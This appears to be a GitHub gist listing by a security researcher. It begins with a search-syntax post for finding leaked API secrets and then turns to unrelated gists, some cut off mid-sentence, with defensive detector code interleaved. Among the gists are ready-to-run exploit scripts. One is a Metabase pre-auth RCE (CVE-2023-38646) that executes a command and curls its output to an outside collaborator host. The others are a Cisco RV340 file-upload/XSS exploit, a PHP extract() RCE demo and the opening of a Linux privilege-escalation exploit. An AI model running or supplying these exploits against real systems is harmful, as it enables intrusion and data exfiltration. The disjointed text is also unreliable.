Bipin Jitiya win3zz

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, you have to conduct thorough reconnaissance. With the increasing use of APIs, keeping access tokens and other API-related secrets out of reach has become paramount. Despite technological advances, human error remains a factor: many developers still unknowingly hardcode API secrets into source code and commit them to public repositories, and GitHub, as a widely popular host for public code, inadvertently ends up hosting such leaked secrets. To help identify these leaks, I have created a comprehensive search list built on GitHub's search syntax; a single query written this way can surface thousands of leaked keys and secrets.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))
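The template above is easiest to read once instantiated. The following is an added example, not code from the gist: it renders the template from four lists and then triages what a search returns by matching fixed-format token shapes (AWS access key ids, GitHub personal access tokens, Slack tokens), since a keyword hit alone is mostly noise. The extension, keyword, signature and tag lists, and the sample `.env` content, are assumptions chosen for illustration (the AWS key id is the documented example key, the GitHub token is a dummy).

```python
import re

# Added example: instantiate the gist's search template and triage the hits.
# The extension/keyword/signature/tag lists passed in below are assumptions
# chosen for illustration, not the gist's own (truncated) examples.


def or_group(items, prefix=""):
    """Render one parenthesised OR group, e.g. (path:*.env OR path:*.json)."""
    return "(" + " OR ".join(f"{prefix}{item}" for item in items) + ")"


def build_query(extensions, keynames, signatures, platform_tags):
    """(path:*.ext ...) AND (keyname ...) AND ((signature ...) AND (platform tag ...))"""
    return " AND ".join([
        or_group(extensions, prefix="path:*."),
        or_group(keynames),
        "(" + or_group(signatures) + " AND " + or_group(platform_tags) + ")",
    ])


# Well-known fixed-format token shapes. A search hit that also matches one of
# these is far more likely to be a live credential than a keyword match alone.
TOKEN_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "slack_token": re.compile(r"\bxox[baprs]-[0-9A-Za-z-]{10,}\b"),
}


def find_secrets(text):
    """Return (line_number, pattern_name, match) for every token-shaped string in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in TOKEN_PATTERNS.items():
            for m in pattern.finditer(line):
                hits.append((lineno, name, m.group(0)))
    return hits


# Constructed sample file content: AWS's documented example key id and a dummy
# GitHub token; the "secret key" line has no fixed shape and is not matched.
SAMPLE_ENV = (
    "# constructed sample, not a real leak\n"
    "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
    "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    "GITHUB_TOKEN=ghp_" + "0" * 36 + "\n"
)

if __name__ == "__main__":
    print(build_query(["env", "json", "yml"],
                      ["AWS_SECRET_ACCESS_KEY", "aws_secret_access_key"],
                      ["AKIA"], ["amazonaws", "aws"]))
    for lineno, name, value in find_secrets(SAMPLE_ENV):
        print(f"line {lineno}: {name}: {value[:8]}...")
```

The query builder only strings the groups together; whether GitHub tolerates a given group size or a quoted multi-word term is up to the search backend, so test a generated query interactively before automating it.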

Examples:

**1.

@win3zz
win3zz / zendesk_endpoints.txt
Created July 18, 2023 09:01
List of Zendesk API Endpoints for Fuzzing [Penetration Testing]
POST /api/v2/accounts
GET /api/v2/activities?since=cstest
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest
GET /api/v2/automations
POST /api/v2/automations
GET /api/v2/bookmarks
POST /api/v2/bookmarks
GET /api/v2/brands
POST /api/v2/brands
GET /api/v2/custom_objects
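A list like this is only useful with a harness that knows which values are injectable. The following is an added example, not the gist's code: it parses `METHOD /path?param=cstest` lines, treats `cstest` as the marker for a string parameter, and substitutes each payload into one parameter at a time so that a changed response can be attributed to a single input. The three sample lines copy the shape of the list; the payload list is an assumption.

```python
from urllib.parse import urlsplit, parse_qsl, urlencode

# Added example: turn a "METHOD /path?param=cstest" list into single-parameter
# fuzz cases. The sample lines and the payloads are assumptions for illustration.

MARKER = "cstest"   # placeholder value the list uses for injectable string parameters

SAMPLE_LIST = """\
POST /api/v2/accounts
GET /api/v2/activities?since=cstest
GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&sort_by=cstest
"""


def parse_endpoints(text):
    """Parse each non-empty, non-comment line into (method, path, [(param, value), ...])."""
    endpoints = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        method, target = line.split(None, 1)
        parts = urlsplit(target)
        endpoints.append((method.upper(), parts.path,
                          parse_qsl(parts.query, keep_blank_values=True)))
    return endpoints


def fuzz_cases(text, payloads):
    """Substitute each payload into one marker parameter at a time.
    Returns (method, request_target, fuzzed_param_or_None); endpoints without a
    marker are emitted once, unchanged, so they still get a baseline request."""
    cases = []
    for method, path, params in parse_endpoints(text):
        marker_positions = [i for i, (_, value) in enumerate(params) if value == MARKER]
        if not marker_positions:
            cases.append((method, path, None))
            continue
        for i in marker_positions:
            for payload in payloads:
                fuzzed = list(params)
                fuzzed[i] = (fuzzed[i][0], payload)
                # urlencode percent-encodes the brackets in filter[...] names;
                # the server URL-decodes them back to the literal form.
                cases.append((method, path + "?" + urlencode(fuzzed), fuzzed[i][0]))
    return cases


if __name__ == "__main__":
    for method, target, param in fuzz_cases(SAMPLE_LIST, ["'", "<x>"]):
        print(method, target, "<-", param)
```

Numeric parameters such as `filter[source_id]=1` are deliberately left alone here; give them their own marker if you want them fuzzed with type-confusion payloads rather than string ones.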
@win3zz
win3zz / CVE-2023-38646.sh
Created July 28, 2023 16:32
Metabase Pre-auth RCE (CVE-2023-38646)
TARGET="http://127.0.0.1:3000"; \
COLLABORATOR="http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oastify.com/"; \
COMMAND="uname -a"; \
ENCODED_COMMAND=$(echo -n "curl -X POST -d \"\$(${COMMAND})\" ${COLLABORATOR}" | base64 | tr -d '\n' | sed 's/=/%3D/g'); \
SETUP_TOKEN=$(curl -s "${TARGET}/api/session/properties" | jq -r '.["setup-token"]'); \
PAYLOAD='{"token":"'${SETUP_TOKEN}'","details":{"details":{"db":"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER test BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('\''bash -c {echo,'${ENCODED_COMMAND}'}|{base64,-d}|{bash,-i}'\'')\n$$--=x","advanced-options": false},"engine":"h2"}}'; \
curl -X POST -H "Content-Type: application/json" -d "${PAYLOAD}" "${TARGET}/api/setup/validate"
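For the defensive side of the same bug, the following is an added example (not the gist's code) that checks the two things the request above depends on: that `GET /api/session/properties` still hands out a `setup-token` after installation, and that a `POST /api/setup/validate` body points the H2 driver at a connection string with appended options and a JavaScript trigger. The sample bodies are constructed; the malicious one mirrors the structure of the gist's payload with the command left out.

```python
import json

# Added example (not the gist's code): recognise this attack shape in a captured
# /api/setup/validate body and confirm the precondition it relies on.
# Sample bodies below are constructed for illustration.

H2_ABUSE_MARKERS = (
    "CREATE TRIGGER",          # H2 trigger bodies may be JavaScript/Java source
    "//javascript",
    "INIT=",                   # INIT=RUNSCRIPT ... is the other classic H2 code-exec path
    "RUNSCRIPT",
    "TRACE_LEVEL_SYSTEM_OUT",
    "zip:",                    # points the driver at the sample database inside the jar
)


def setup_token_exposed(properties):
    """True when /api/session/properties returns a usable setup-token, which is
    what lets an unauthenticated caller reach /api/setup/validate."""
    return bool(properties.get("setup-token"))


def flag_h2_validate_request(body):
    """Return the reasons a validate body looks like H2 connection-string abuse ([] if benign)."""
    reasons = []
    details = body.get("details", {})
    if details.get("engine") != "h2":
        return reasons
    reasons.append("engine=h2")
    db = str(details.get("details", {}).get("db", ""))
    if ";" in db:
        reasons.append("driver options appended to the db path")
    for marker in H2_ABUSE_MARKERS:
        if marker.lower() in db.lower():
            reasons.append(f"marker {marker!r}")
    return reasons


def flag_h2_validate_raw(raw_json):
    """Same check over the raw request body as a proxy or WAF would see it."""
    return flag_h2_validate_request(json.loads(raw_json))


MALICIOUS_BODY = {
    "token": "00000000-0000-0000-0000-000000000000",   # placeholder, not a real token
    "details": {
        "details": {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;"
                  "TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER t BEFORE SELECT ON "
                  "INFORMATION_SCHEMA.TABLES AS $$//javascript\n<command omitted>\n$$--=x",
            "advanced-options": False,
        },
        "engine": "h2",
    },
}
BENIGN_BODY = {"token": "", "details": {"details": {"db": "/var/lib/metabase/app.db"}, "engine": "h2"}}

if __name__ == "__main__":
    print(setup_token_exposed({"setup-token": "placeholder"}))
    print(flag_h2_validate_raw(json.dumps(MALICIOUS_BODY)))
    print(flag_h2_validate_request(BENIGN_BODY))
```

`engine=h2` by itself is only context (a fresh install legitimately uses H2); the combination with appended driver options and a trigger or `RUNSCRIPT` marker is the signal worth alerting on.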
@win3zz
win3zz / CVE-2023-20073.sh
Created August 18, 2023 16:56
Unauthenticated Arbitrary File Upload and Stored XSS in Cisco RV340, RV340W, RV345, RV345P VPN Routers (CVE-2023-20073)
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
@win3zz
win3zz / PHP_Extract_Demo_Security.sh
Created August 21, 2023 13:15
Unsanitized User Input in PHP extract() and Dynamic Functions Can Lead to RCE
#!/bin/bash
# Display PHP version
php -v
# Create a PHP file containing malicious code using 'extract()'
echo '<?php extract($_GET); $ctx($str); ?>' > extract_test.php
# Display the contents of the created PHP file
cat extract_test.php
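The demo works because two things meet in one file: `extract()` over a request superglobal lets the caller define arbitrarily named variables, and `$ctx($str)` calls whatever function name `$ctx` holds. The following is an added example, not the gist's code: a small source check that flags each ingredient separately and reports the chain when both are present. The PHP snippets are constructed; the first is the gist's one-liner, the second is one allowlist-based way to avoid it.

```python
import re

# Added example (not the gist's code): flag extract() over request superglobals
# and variable-function calls in PHP source. Sample PHP below is constructed.

EXTRACT_REQUEST = re.compile(r"\bextract\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")
DYNAMIC_CALL = re.compile(r"\$(\w+)\s*\(")     # $name(...) calls whatever string $name holds


def audit_php(src):
    """Return (line_number, kind, message) findings for one PHP source string."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if EXTRACT_REQUEST.search(line):
            findings.append((lineno, "extract",
                             "extract() of a request superglobal defines attacker-named variables"))
        for m in DYNAMIC_CALL.finditer(line):
            findings.append((lineno, "dynamic_call",
                             f"${m.group(1)}() resolves its callee at runtime"))
    return findings


def has_rce_chain(src):
    """True when attacker-controlled variable names and a variable-function call coexist."""
    kinds = {kind for _, kind, _ in audit_php(src)}
    return {"extract", "dynamic_call"} <= kinds


VULN_PHP = "<?php extract($_GET); $ctx($str); ?>"

# The callee comes from a fixed map keyed by the request value, never from the
# value itself, and unknown keys are rejected.
SAFE_PHP = """<?php
$handlers = ['upper' => 'strtoupper', 'lower' => 'strtolower'];
$op = $_GET['op'] ?? 'upper';
if (!isset($handlers[$op])) { http_response_code(400); exit; }
echo $handlers[$op]($_GET['str'] ?? '');
?>"""

if __name__ == "__main__":
    for src in (VULN_PHP, SAFE_PHP):
        print(audit_php(src), "rce chain:", has_rce_chain(src))
```

The regexes are deliberately line-based and loose; `extract()` with `EXTR_SKIP` is still flagged because `EXTR_SKIP` only protects variables that already exist, and `$ctx` in the demo does not.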
@win3zz
win3zz / uncovering-malware-trap.md
Created August 24, 2023 09:27
Unmasking a Hidden Threat

As a security professional, you know how important it is to keep yourself updated in the InfoSec world. To keep myself updated about security vulnerabilities, I regularly analyze the latest Common Vulnerabilities and Exposures (CVEs). If the Proof of Concept (PoC) or write-up is publicly available, I try to analyze and understand the root cause of the vulnerability.

Today, I'm going to share a recent experience that left me surprised. I came across a public PoC of CVE-2023-3519 - Unauthenticated Remote Code Execution vulnerability in Citrix ADC that was critical (CVSS score: 9.8/10). The PoC was hosted on Github at https://github.com/knitteruntil0s/CVE-2023-3519 (archive).

While reviewing its code, I was surprised that it was my own code that I wrote a few months ago to demonstrate the [GeoServer SQL injection vulnerability (CVE-2023-25157)](https://

@win3zz
win3zz / CVE-2023-21939.md
Created August 27, 2023 12:33
CVE-2023-21939 - Code Exec - Proof of Concept

Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie

@win3zz
win3zz / Task-Hijacking-WhatsApp.md
Created September 10, 2023 10:03
Task Hijacking Vulnerability in WhatsApp - Android

Around a year ago, I discovered a long-standing vulnerability in WhatsApp and other popular Android applications. Despite its existence for years, this vulnerability remained largely theoretical. To demonstrate its real-world impact, I successfully exploited it in WhatsApp, Facebook, and Facebook Lite. I promptly reported my findings to Facebook's Whitehat program. In this post, I'll share the details I provided to Facebook.

Don't want to read? Skip the technical details and watch the demo video here: https://youtu.be/1p3tehj3aUQ

Finding Description

While reviewing the WhatsApp Android application, we identified a misconfiguration in AndroidManifest.xml related to task control features. This misconfiguration leads to a critical vulnerability called task hijacking and enables the attack flow against the latest WhatsApp release on Android phones.
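The task-control settings in question are the ones that decide which task an activity lands in. By default an activity's `android:taskAffinity` is its own package name, a value any other app may declare on one of its activities so that it joins, and sits on top of, the victim's task; `android:allowTaskReparenting="true"` lets an activity migrate between tasks. The following is an added example, not the report's code: a check over an `AndroidManifest.xml` that reports every activity whose effective affinity is still shareable, with an empty `android:taskAffinity=""` as the hardened form. The package name and activities are constructed.

```python
import xml.etree.ElementTree as ET

# Added example (not the report's code): find the task-control settings in an
# AndroidManifest.xml that make task hijacking possible. Manifests are constructed.

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"


def task_hijack_findings(manifest_xml):
    """Return (activity_name, reason) for every activity that another app's
    activity could share a task with."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    app = root.find("application")
    app_affinity = app.get(ANDROID_NS + "taskAffinity")   # None if not set on <application>
    findings = []
    for activity in app.iter("activity"):
        name = activity.get(ANDROID_NS + "name")
        affinity = activity.get(ANDROID_NS + "taskAffinity", app_affinity)
        if affinity is None:
            affinity = package   # platform default: the app's own package name
        # Any non-empty affinity is a name another app may declare on its own
        # activity; the empty string can never be matched by a foreign activity.
        if affinity != "":
            findings.append((name, f"taskAffinity {affinity!r} is shareable; set android:taskAffinity=\"\""))
        if activity.get(ANDROID_NS + "allowTaskReparenting") == "true":
            findings.append((name, "allowTaskReparenting=true lets the activity move between tasks"))
    return findings


VULNERABLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.victim">
  <application android:label="Victim">
    <activity android:name=".MainActivity" android:exported="true" />
    <activity android:name=".ChatActivity" android:allowTaskReparenting="true" />
  </application>
</manifest>
"""

# Same manifest with the affinity cleared app-wide and reparenting removed.
HARDENED_MANIFEST = VULNERABLE_MANIFEST.replace(
    '<application android:label="Victim">',
    '<application android:label="Victim" android:taskAffinity="">',
).replace(' android:allowTaskReparenting="true"', "")

if __name__ == "__main__":
    for name, reason in task_hijack_findings(VULNERABLE_MANIFEST):
        print(name, "-", reason)
    print("hardened:", task_hijack_findings(HARDENED_MANIFEST))
```

Run it against the manifest pulled from a decoded APK rather than the source tree, since merged library manifests can reintroduce an affinity the app's own manifest never set.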

In successful exploitation of the vulnerability, the malicious

CVE-2023-43260

Reflected Cross-Site Scripting (XSS) and Absent HttpOnly Flag in Ursalink Industrial Cellular Router Admin Panel Leads to Account Takeover

Vulnerability Details

Cross-Site Scripting (XSS) and missing HttpOnly flag vulnerabilities in the Ursalink Industrial Cellular Router admin panel could allow remote attackers to execute arbitrary scripts and hijack user sessions, potentially leading to account takeover.

The admin panel does not properly validate and sanitize user input, allowing malicious scripts to be injected into the page's content. The "td" session cookie lacks the HttpOnly flag (and also the Secure flag), so client-side script can read it, leading to session hijacking and unauthorized access. Attackers can steal sensitive information, impersonate users, or perform unauthorized actions.

  • Affected Products: UR5X, UR32L, UR32, UR35, UR41; other Ursalink industrial cellular routers may also be vulnerable.
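The two findings chain: reflected XSS gives the attacker script execution in the victim's origin, and a session cookie without HttpOnly is readable from `document.cookie`, so the script can exfiltrate it. The following is an added example, not the advisory's code: an audit of the `Set-Cookie` headers in a raw HTTP response that lists, per cookie, the protections the advisory reports missing. The two responses are constructed; the cookie name `td` is taken from the advisory.

```python
# Added example (not the advisory's code): audit Set-Cookie headers in a raw
# HTTP response for HttpOnly, Secure and SameSite. Responses are constructed.


def audit_set_cookie(header_value):
    """Return (cookie_name, [missing protections]) for one Set-Cookie value."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for attr in parts[1:]:
        key, _, value = attr.partition("=")
        attrs[key.strip().lower()] = value.strip() or True   # bare flags become True
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")        # readable via document.cookie, so XSS can exfiltrate it
    if "secure" not in attrs:
        missing.append("Secure")          # also sent over plain HTTP
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        missing.append("SameSite=Lax/Strict")   # sent on cross-site requests
    return name, missing


def audit_response(raw_response):
    """Map every cookie set by a raw HTTP response to its list of missing protections."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    results = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        field, _, value = line.partition(":")
        if field.strip().lower() == "set-cookie":
            name, missing = audit_set_cookie(value.strip())
            results[name] = missing
    return results


VULNERABLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: td=0123456789abcdef; Path=/\r\n"
    "\r\n<html>...</html>"
)
HARDENED_RESPONSE = VULNERABLE_RESPONSE.replace(
    "Set-Cookie: td=0123456789abcdef; Path=/",
    "Set-Cookie: td=0123456789abcdef; Path=/; HttpOnly; Secure; SameSite=Strict",
)

if __name__ == "__main__":
    print(audit_response(VULNERABLE_RESPONSE))
    print(audit_response(HARDENED_RESPONSE))
```

HttpOnly closes the cookie-theft path but not the XSS itself: script running in the admin origin can still issue authenticated requests directly, so the input handling fix is the one that matters.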
@win3zz
win3zz / GameOver(lay).md
Last active February 22, 2024 11:50
Privilege escalation vulnerabilities in Ubuntu/Kali Linux (CVE-2023-2640 and CVE-2023-32629)
user@hostname:~/exploit$ cat > test.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    if (setuid(0) != 0) {